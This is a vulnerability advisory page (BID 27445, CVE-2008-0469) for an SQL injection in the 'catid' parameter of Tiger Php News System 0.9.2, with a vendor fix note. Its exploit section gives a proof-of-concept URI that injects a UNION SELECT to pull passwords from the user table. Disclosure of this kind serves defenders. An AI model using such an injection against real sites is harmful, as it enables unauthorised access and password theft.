Tiger Php News System 'catid' Parameter SQL Injection Vulnerability
BID:27445
Info
Tiger Php News System 'catid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 27445 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0469 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 24 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | 0in is credited with the discovery of this vulnerability. |
| Vulnerable: |
Tiger Php News System Tiger Php News System 0.9.2 |
| Not Vulnerable: |
Tiger Php News System Tiger Php News System 1.0 Beta |
Discussion
Tiger Php News System 'catid' Parameter SQL Injection Vulnerability
Tiger Php News System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tiger Php News System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Tiger Php News System 'catid' Parameter SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/?page=newscat&catid=-666%20union%20select%20passwd%20from%20user
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/?page=newscat&catid=-666%20union%20select%20passwd%20from%20user
Solution / Fix
Tiger Php News System 'catid' Parameter SQL Injection Vulnerability
Solution:
The vendor has released an update. Please see the references for more information.
Tiger Php News System Tiger Php News System 0.9.2
Solution:
The vendor has released an update. Please see the references for more information.
Tiger Php News System Tiger Php News System 0.9.2
-
Tiger Php News System tigerPhpNewsSystem_testing.tar.gz
http://tpns.k-na.se/tigerPhpNewsSystem_testing.tar.gz
References
Tiger Php News System 'catid' Parameter SQL Injection Vulnerability
References:
References:
- CVE-2008-0469 fixed in 1.0b build 63. (Tiger PHP News System)
- Tiger Php News System Homepage (Tiger Php News System)
- Tiger PHP News System SQL Injection ([email protected])